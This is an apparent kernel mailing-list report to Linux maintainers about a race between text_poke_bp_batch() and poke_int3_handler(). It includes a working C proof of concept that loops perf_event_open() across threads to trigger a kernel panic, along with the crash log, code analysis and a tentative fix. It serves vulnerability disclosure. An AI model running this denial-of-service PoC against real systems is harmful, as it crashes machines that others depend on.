[Report] Race Condition in text_poke_bp_batch/poke_int3_handler
From: Seohyeon Maeng
Date: Tue Dec 03 2024 - 03:23:26 EST
Dear Maintainers,
This email reports a race condition in the Linux kernel that can be abused to cause a denial of service (DoS).
While testing on a system with a 4-core CPU and 4 GB of RAM, I observed that the Proof of Concept (PoC) below reliably triggers a kernel panic.
#define _GNU_SOURCE
#include <linux/perf_event.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <pthread.h>
#include <sched.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>

#define NUM_THREADS 8

static long perf_event_open(struct perf_event_attr *hw_event, pid_t pid,
                            int cpu, int group_fd, int flags)
{
        return syscall(SYS_perf_event_open, hw_event, pid, cpu, group_fd, flags);
}

/* Pin the calling thread (pid 0) to a single CPU. */
static inline int _pin_to_cpu(int id)
{
        cpu_set_t set;

        CPU_ZERO(&set);
        CPU_SET(id, &set);
        return sched_setaffinity(0, sizeof(set), &set);
}

void *perf_event_task(void *arg)
{
        int cpu_id = *((int *)arg);
        struct perf_event_attr pe;

        if (_pin_to_cpu(cpu_id) != 0) {
                perror("Failed to set CPU affinity");
                pthread_exit(NULL);
        }

        memset(&pe, 0, sizeof(pe));
        pe.type = PERF_TYPE_SOFTWARE;
        pe.size = sizeof(pe);
        pe.config = PERF_COUNT_SW_PAGE_FAULTS;
        pe.disabled = 0;
        pe.exclude_kernel = 1;
        pe.exclude_hv = 1;
        pe.read_format = PERF_FORMAT_GROUP | PERF_FORMAT_ID | PERF_FORMAT_LOST;
        pe.inherit = 1;
        pe.inherit_stat = 1;

        /*
         * Repeatedly create and destroy a software event so that the
         * associated static keys are toggled over and over, forcing
         * frequent text patching via text_poke_bp_batch().
         */
        while (1) {
                int fd = perf_event_open(&pe, 0, -1, -1, 0);

                if (fd >= 0)
                        close(fd);
                sched_yield();
        }
        return NULL;
}

int main(void)
{
        pthread_t threads[NUM_THREADS];
        int cpu_ids[NUM_THREADS];
        long ncpus = sysconf(_SC_NPROCESSORS_ONLN);
        int i;

        for (i = 0; i < NUM_THREADS; i++) {
                cpu_ids[i] = i % ncpus;
                if (pthread_create(&threads[i], NULL, perf_event_task,
                                   &cpu_ids[i]) != 0) {
                        perror("Failed to create thread");
                        exit(EXIT_FAILURE);
                }
        }
        for (i = 0; i < NUM_THREADS; i++)
                pthread_join(threads[i], NULL);

        return 0;
}
The PoC demonstrates how the issue can be abused to cause a DoS: running it on the system described above reliably triggers a kernel panic after a short while.
~ $ ./a.out
[ 24.727144] Oops: int3: 0000 [#1] PREEMPT SMP NOPTI
[ 24.729582] CPU: 0 UID: 0 PID: 8 Comm: kworker/0:0 Not tainted 6.12.0-rc4-00003-g6fad274f06f0 #1
[ 24.729808] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[ 24.730160] Workqueue: 0x0 (events)
[ 24.732854] RIP: 0010:__schedule+0x342/0x8f0
[ 24.733886] Code: 48 29 c1 49 01 8c 24 60 04 00 00 4d 85 ed 74 0f 49 01 8d 30 0c 00 00 49 83 85 4
[ 24.734418] RSP: 0018:ffffc9000004be48 EFLAGS: 00000016
[ 24.734462] RAX: 00000005c1bc7f6e RBX: 0000000000000000 RCX: 000000000005704a
[ 24.734507] RDX: 00000005c1c1efb8 RSI: ffff88813bc2d6c0 RDI: 0000000000000000
[ 24.734527] RBP: ffffc9000004bea8 R08: 0000000000000800 R09: 0000000000000001
[ 24.734543] R10: 0000000000000002 R11: 0000000000000157 R12: ffff8881001ad700
[ 24.734557] R13: ffff88813bc2d640 R14: ffff88810013cf40 R15: ffff888100196580
[ 24.734614] FS: 0000000000000000(0000) GS:ffff88813bc00000(0000) knlGS:0000000000000000
[ 24.734644] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 24.734656] CR2: 00007f089b250658 CR3: 00000001001be000 CR4: 00000000000006f0
[ 24.734743] Call Trace:
[ 24.735508] <TASK>
[ 24.735841] ? die+0x32/0x90
[ 24.735946] ? exc_int3+0x10f/0x120
[ 24.735958] ? asm_exc_int3+0x39/0x40
[ 24.735995] ? __schedule+0x342/0x8f0
[ 24.736011] ? __schedule+0x342/0x8f0
[ 24.736021] ? __schedule+0x203/0x8f0
[ 24.736031] ? queue_delayed_work_on+0x53/0x60
[ 24.736060] schedule+0x22/0xd0
[ 24.736281] worker_thread+0x1a2/0x3b0
[ 24.736304] ? __pfx_worker_thread+0x10/0x10
[ 24.736317] kthread+0xd1/0x100
[ 24.736330] ? __pfx_kthread+0x10/0x10
[ 24.736340] ret_from_fork+0x2f/0x50
[ 24.736353] ? __pfx_kthread+0x10/0x10
[ 24.736365] ret_from_fork_asm+0x1a/0x30
[ 24.736422] </TASK>
[ 24.736462] Modules linked in:
[ 24.736968] ---[ end trace 0000000000000000 ]---
[ 24.737006] Oops: int3: 0000 [#2] PREEMPT SMP NOPTI
[ 24.737169] RIP: 0010:__schedule+0x342/0x8f0
[ 24.737190] Code: 48 29 c1 49 01 8c 24 60 04 00 00 4d 85 ed 74 0f 49 01 8d 30 0c 00 00 49 83 85 4
[ 24.737198] RSP: 0018:ffffc9000004be48 EFLAGS: 00000016
[ 24.737210] RAX: 00000005c1bc7f6e RBX: 0000000000000000 RCX: 000000000005704a
[ 24.737216] RDX: 00000005c1c1efb8 RSI: ffff88813bc2d6c0 RDI: 0000000000000000
[ 24.737221] RBP: ffffc9000004bea8 R08: 0000000000000800 R09: 0000000000000001
[ 24.737226] R10: 0000000000000002 R11: 0000000000000157 R12: ffff8881001ad700
[ 24.737230] R13: ffff88813bc2d640 R14: ffff88810013cf40 R15: ffff888100196580
[ 24.737237] FS: 0000000000000000(0000) GS:ffff88813bc00000(0000) knlGS:0000000000000000
[ 24.737244] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 24.737249] CR2: 00007f089b250658 CR3: 00000001001be000 CR4: 00000000000006f0
[ 24.737399] Kernel panic - not syncing: Fatal exception in interrupt
[ 30.673416] Shutting down cpus with NMI
[ 30.674903] Kernel Offset: disabled
I have identified a race condition between text_poke_bp_batch() and poke_int3_handler(). The issue arises when perf events are repeatedly created and destroyed, which repeatedly enables and disables static branches. The following call chain shows how perf_event_open() reaches the patching code:
__do_sys_perf_event_open
  perf_event_alloc
    perf_swevent_init
      static_key_slow_inc
        jump_label_update
          arch_jump_label_transform_apply
            text_poke_finish
              text_poke_flush
                text_poke_bp_batch
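For completeness, the close() in the PoC loop drives a mirror-image path on the release side. Paraphrasing from my reading of kernel/events/core.c (the exact chain may differ between versions):

close
  perf_release
    perf_event_release_kernel
      _free_event
        sw_perf_event_destroy
          static_key_slow_dec
            jump_label_update
              arch_jump_label_transform_apply
                text_poke_finish
                  text_poke_flush
                    text_poke_bp_batch

If I read the code correctly, the decrement of perf_sched_events itself is additionally deferred to a delayed work item, which would be consistent with the panic above occurring on a kworker thread. The net effect of the PoC is that the same branch sites are patched over and over, concurrently with heavy scheduling activity.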
On the other side of the race is the context-switch path: __schedule() calls prepare_task_switch(), which invokes perf_event_task_sched_out(), and that function contains one of the static branch sites being patched:
static inline void perf_event_task_sched_out(struct task_struct *prev,
                                             struct task_struct *next)
{
        [...]
        if (static_branch_unlikely(&perf_sched_events))
                __perf_event_task_sched_out(prev, next);
}
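For context on why an int3 trap can fire here at all: on x86-64 the static branch compiles down to a single 5-byte NOP or JMP instruction, and text_poke_bp_batch() rewrites such sites in stages, roughly as follows (my paraphrase of the mechanism in arch/x86/kernel/alternative.c):

        before:  0f 1f 44 00 00      5-byte NOP (branch disabled)
        step 1:  cc 1f 44 00 00      int3 planted on the first byte
        step 2:  cc xx xx xx xx      tail of the new JMP rel32 written
        step 3:  e9 xx xx xx xx      first byte replaced, branch enabled

with IPI-based synchronization between the steps. Any CPU that executes the site between step 1 and step 3 traps into poke_int3_handler(), which must look up the trapping address in bp_desc to emulate the old or new instruction: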
noinstr int poke_int3_handler(struct pt_regs *regs)
{
        [...]
        desc = try_get_desc(); // [1]
        if (!desc)
                return 0;

        [...]
        if (unlikely(desc->nr_entries > 1)) {
                tp = __inline_bsearch(ip, desc->vec, desc->nr_entries,
                                      sizeof(struct text_poke_loc),
                                      patch_cmp);
                if (!tp)
                        goto out_put;
        } else {
                tp = desc->vec;
                if (text_poke_addr(tp) != ip)
                        goto out_put;
        }

        [...]
out_put:
        put_desc();
        return ret;
}
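For reference, the refcount helpers used at [1] and in out_put look roughly like this (paraphrased from arch/x86/kernel/alternative.c; the exact spelling varies across kernel versions):

static __always_inline
struct bp_patching_desc *try_get_desc(void)
{
        struct bp_patching_desc *desc = &bp_desc;

        /* Inc-not-zero: only succeeds while a batch holds the initial ref. */
        if (!raw_atomic_inc_not_zero(&desc->refs))
                return NULL;

        return desc;
}

static __always_inline void put_desc(void)
{
        smp_mb__before_atomic();
        raw_atomic_dec(&bp_desc.refs);
}

Note that nothing here checks that the descriptor still belongs to the batch that planted the int3 being handled.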
While poke_int3_handler() is executing on one CPU, another CPU can enter the patching path again and reinitialize bp_desc: the refcount is reset by atomic_set_release(), and bp_desc.vec and bp_desc.nr_entries are overwritten. The handler then operates on a descriptor that no longer describes the batch that planted its int3, loses the information it needs, and fails to handle the trap:
static void text_poke_bp_batch(struct text_poke_loc *tp, unsigned int nr_entries)
{
        [...]
        lockdep_assert_held(&text_mutex);

        bp_desc.vec = tp;
        bp_desc.nr_entries = nr_entries;

        /*
         * Corresponds to the implicit memory barrier in try_get_desc() to
         * ensure reading a non-zero refcount provides up to date bp_desc data.
         */
        atomic_set_release(&bp_desc.refs, 1); // [2]

        [...]

        /*
         * Remove and wait for refs to be zero.
         */
        if (!atomic_dec_and_test(&bp_desc.refs)) // [3]
                atomic_cond_read_acquire(&bp_desc.refs, !VAL);

        [...]
}
As shown above, bp_desc and its refcount can be modified while poke_int3_handler() is still running.
Consider two CPUs interleaving the marked operations as [1] -> [2] -> [3] -> [1], with the refcount operations overlapping: once [3] drops the refcount to zero, the next batch can execute [2] and reinitialize the descriptor.
When the trapped CPU then reaches [1], it either fails to get the descriptor or gets one that no longer contains its trapping address; in both cases the handler returns without handling the int3, and the kernel panics.
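To make the window concrete, here is a minimal userspace model of the refcount protocol (illustrative only: the names mirror the kernel's, but everything below is a stand-in; the "batch" field models bp_desc.vec/nr_entries, and reading it before taking the reference models the fact that the trapping address belongs to the batch that planted the int3). Built like the PoC (gcc -O2 -pthread), it should report a lookup against a recycled descriptor fairly quickly on a multicore machine:

#include <pthread.h>
#include <stdatomic.h>
#include <stdio.h>
#include <stdlib.h>

/* Stand-in for bp_desc. */
static struct {
        atomic_int refs;
        atomic_int batch;       /* models bp_desc.vec / nr_entries */
} bp_desc;

/* Models try_get_desc(): take a reference only if refs is non-zero. */
static int try_get_desc(void)
{
        int old = atomic_load(&bp_desc.refs);

        while (old != 0)
                if (atomic_compare_exchange_weak(&bp_desc.refs, &old, old + 1))
                        return 1;
        return 0;
}

/* Models put_desc(). */
static void put_desc(void)
{
        atomic_fetch_sub(&bp_desc.refs, 1);
}

/* Models text_poke_bp_batch(): publish, patch, retract, wait. */
static void *patcher(void *arg)
{
        for (int batch = 1; ; batch++) {
                atomic_store(&bp_desc.batch, batch);    /* new vec/nr_entries */
                atomic_store_explicit(&bp_desc.refs, 1,
                                      memory_order_release);    /* [2] */
                /* ... instruction patching would happen here ... */
                atomic_fetch_sub(&bp_desc.refs, 1);             /* [3] */
                while (atomic_load(&bp_desc.refs) != 0)
                        ;       /* wait for late readers, as in [3]'s slow path */
        }
        return NULL;
}

/*
 * Models poke_int3_handler(): the trap belongs to the batch current at
 * trap time, captured here before the reference is taken.
 */
static void *handler(void *arg)
{
        for (;;) {
                int my_batch = atomic_load(&bp_desc.batch);

                if (!try_get_desc())                            /* [1] */
                        continue;
                if (atomic_load(&bp_desc.batch) != my_batch) {
                        /*
                         * The descriptor was recycled between the trap and
                         * the lookup: the real handler's bsearch would miss,
                         * return 0, and the kernel would take an unhandled
                         * int3 -> Oops.
                         */
                        printf("stale descriptor: int3 from batch %d, desc is batch %d\n",
                               my_batch, atomic_load(&bp_desc.batch));
                        put_desc();
                        exit(1);
                }
                put_desc();
        }
        return NULL;
}

int main(void)
{
        pthread_t p, h;

        pthread_create(&p, NULL, patcher, NULL);
        pthread_create(&h, NULL, handler, NULL);
        pthread_join(p, NULL);
        pthread_join(h, NULL);
        return 0;
}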
To address this issue, I suggest adding a validation mechanism to the interrupt handler to guard against this race: before acting on bp_desc, the handler should verify that it is not observing a descriptor belonging to a different, in-flight batch, and take no action if it is.
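Purely to illustrate the shape of that suggestion (hypothetical and untested; bp_batch_gen does not exist in the current code, and this alone is likely not a complete fix), one could imagine a per-batch generation counter that the handler snapshots on entry and re-checks after taking its reference:

/* Hypothetical: bumped by text_poke_bp_batch() for every new batch. */
static atomic_t bp_batch_gen;

noinstr int poke_int3_handler(struct pt_regs *regs)
{
        int gen = atomic_read_acquire(&bp_batch_gen);

        [...]
        desc = try_get_desc();
        if (!desc)
                return 0;

        /*
         * The descriptor was recycled between the trap and the lookup;
         * do not search a vec that belongs to a different batch.
         */
        if (atomic_read(&bp_batch_gen) != gen)
                goto out_put;
        [...]
}

What the handler should then do with such a stale trap is the part I am unsure about.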
I attempted to address this with a patch, but I am not yet familiar enough with this code to judge the most effective fix. Nevertheless, I wanted to bring the problem to your attention, as it appears to warrant further investigation.
Thank you for your time and consideration in addressing this issue.
Best Regards,
Seohyeon Maeng